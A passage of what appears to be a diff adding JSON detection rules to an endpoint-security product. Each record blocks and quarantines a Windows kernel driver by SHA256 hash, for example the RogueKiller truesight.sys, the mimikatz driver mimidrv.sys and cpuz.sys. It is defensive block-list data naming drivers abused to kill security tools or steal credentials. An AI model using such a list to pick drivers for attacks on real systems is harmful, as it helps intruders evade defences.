[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9b7be35-5e2a-54e7-b77d-b48ce2fe6831", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464174Z", + "creation_date": "2026-03-23T11:45:30.464177Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464186Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "469713c76c7a887826611b8c7180209a8bb6250f91d0f1eb84ac4d450ef15870", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9b83c5e-c477-55e0-ae14-5bef9b69268d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982783Z", + "creation_date": "2026-03-23T11:45:29.982785Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982791Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "36875562e747136313ec5db58174e5fab870997a054ca8d3987d181599c7db6a", + "comment": "Vulnerable Kernel Driver (aka d3.sys) [https://www.loldrivers.io/drivers/13b2424a-d337-4bc7-ad1d-2049c79906b4/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9bb27e1-f6b7-515d-bce0-e3642e79674b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827515Z", + "creation_date": "2026-03-23T11:45:31.827517Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827523Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b87c1cbcddf705ac36318dd8e94167ef075ba3ae916ad616a89a8359e6b37f89", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9c3b56a-956d-56e4-bfaf-83a0ff19bb27", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, 
+ "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982904Z", + "creation_date": "2026-03-23T11:45:29.982906Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982911Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "48b1344e45e4de4dfb74ef918af5e0e403001c9061018e703261bbd72dc30548", + "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9c75ac2-0714-5f2b-bbb2-38c25dc23561", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495886Z", + "creation_date": "2026-03-23T11:45:31.495888Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495894Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": 
null, + "references": [], + "type": "hash", + "value": "4f19be2c132005189b4bed20bb2968673555f93f961a1b7ace91bd69aec7ef10", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9ccab93-9c73-5dcf-86e1-f0b9be0555de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834549Z", + "creation_date": "2026-03-23T11:45:30.834552Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834561Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "445c9a8200c34c8ff4d7eba1df57247b32780132c0cb16c9e085f40f4d874c66", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9cdc50b-9d2b-51b1-b1d3-b5fa51176b9e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616150Z", + "creation_date": "2026-03-23T11:45:29.616153Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616158Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f2b51fbeead17f5ee34d5b4a3a83c848fb76f8f0e80769212e137a7aa539a3bc", + "comment": "Phoenix Tech. vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9ce7030-ea2d-5fb0-829e-cfcbff58dc84", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820547Z", + "creation_date": "2026-03-23T11:45:30.820549Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820554Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "74264ce2e0ed67730b0f3c719aee37664d4688f872875322a64022cd68e060bb", + "comment": "Vulnerable 
Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9d2b6eb-e985-5e0c-9f93-a6a2fbfeb300", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148019Z", + "creation_date": "2026-03-23T11:45:31.148021Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148026Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a3fd69a7e84c6c5f84cc8617e868d3719b7f9ade196467b49a5a82e7ea65619a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9d34c34-ef50-5d3c-8811-1a13b9c3ab7a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.620260Z", + "creation_date": "2026-03-23T11:45:29.620262Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620267Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "61d6e40601fa368800980801a662a5b3b36e3c23296e8ae1c85726a56ef18cc8", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9dac64a-7c54-578b-890e-5af4724dfa5a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977000Z", + "creation_date": "2026-03-23T11:45:29.977003Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977008Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "78536b73d77fc07c9ca55766f592852abda179c6deb92c4456cfd89492b594ac", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9e6f7b7-8fed-591e-b121-daf8595cc5da", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980116Z", + "creation_date": "2026-03-23T11:45:29.980117Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980123Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f15962354d37089884abba417f58e9dbd521569b4f69037a24a37cfc2a490672", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9ea0de8-7e38-5486-970c-354ddfb4cc59", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159710Z", + "creation_date": "2026-03-23T11:45:31.159712Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.159717Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3775d48fe24462bcb6139ce2b4630efb307f18d804e58549cd5fb00ff24a5b6e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9ea16b6-6601-5fe4-b206-4eb0eeda689e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455445Z", + "creation_date": "2026-03-23T11:45:30.455448Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455457Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8ecd15521b2c37d2ff02a138700007f2aff28a0accfa6fb3480a4421194ef7d2", + "comment": "Vulnerable Kernel Driver (aka mhyprotrpg.sys) [https://www.loldrivers.io/drivers/181b89e5-4bdd-4e95-b1bc-a294a4adfb29/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9eef577-11e4-5cdf-9250-c80361f176ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832960Z", + "creation_date": "2026-03-23T11:45:30.832963Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832971Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "36c1d01074ceca73b7cbe87b0731ecd8fdeb1518de610f72a23bd7821124f469", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9f034a4-260d-5387-b2a0-2be9a2ff07fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485483Z", + "creation_date": "2026-03-23T11:45:31.485486Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485496Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "fa3e1336fbdb2d5751502185168dd5ebfeedcebd2e9992209962f316116b3c7b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9f0c941-ea47-5800-89b5-68ca5e3e5ed7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833202Z", + "creation_date": "2026-03-23T11:45:30.833206Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833215Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f31f2dc87e5d6d75ea026d031bcd93d68dea66b168c1171c67a25c4ef2641c14", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9f55acd-2255-589a-a5f2-7d9ff8002fed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493737Z", + "creation_date": "2026-03-23T11:45:31.493740Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493748Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d9f9e0d886e5c02e9b803fe730a9c796ce9bda5763d14fe591bae72c284a359d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ca0e062b-1254-54f1-a191-47e4b933af3e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473066Z", + "creation_date": "2026-03-23T11:45:30.473070Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473079Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a11cf43794ea5b5122a0851bf7de08e559f6e9219c77f9888ff740055f2c155e", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) 
[https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ca1dcb39-6f83-5e95-9f83-7dceb7840be8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153258Z", + "creation_date": "2026-03-23T11:45:31.153261Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153269Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d463ddc2979f150d69f7b0c029e6d2a496da80c31dd187fe17b5a4758422d3eb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ca21f245-0fea-5922-b730-e9a3fe6c35f1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467032Z", + "creation_date": 
"2026-03-23T11:45:30.467035Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467044Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e0fa3fa9488583353b39f12f857911b7115ecd82b70f6fb7be70633d72147649", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ca22d5b7-1a3f-5294-9414-f2c4b1ac3791", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824820Z", + "creation_date": "2026-03-23T11:45:30.824823Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824831Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff613c93ca3d3083256122c149f93d280c5a399b95056021d2824fe885abbc2c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ca2846ea-82cb-5900-857b-dfa65eb613be", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621737Z", + "creation_date": "2026-03-23T11:45:29.621739Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621745Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c470c9db58840149ce002f3e6003382ecf740884a683bae8f9d10831be218fa2", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ca44402d-5da0-5fd4-b3d1-c8991d23d2e6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472525Z", + "creation_date": "2026-03-23T11:45:31.472528Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472537Z", + "rule_level": null, + "rule_level_override": null, + 
"rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a3437986f500aa26ced21951972a96f9140f50d9ddb33e2f7b84f8ac105ca3bc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ca4c451e-ec0a-58b7-8304-d70e67ec5fb4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494302Z", + "creation_date": "2026-03-23T11:45:31.494305Z", + 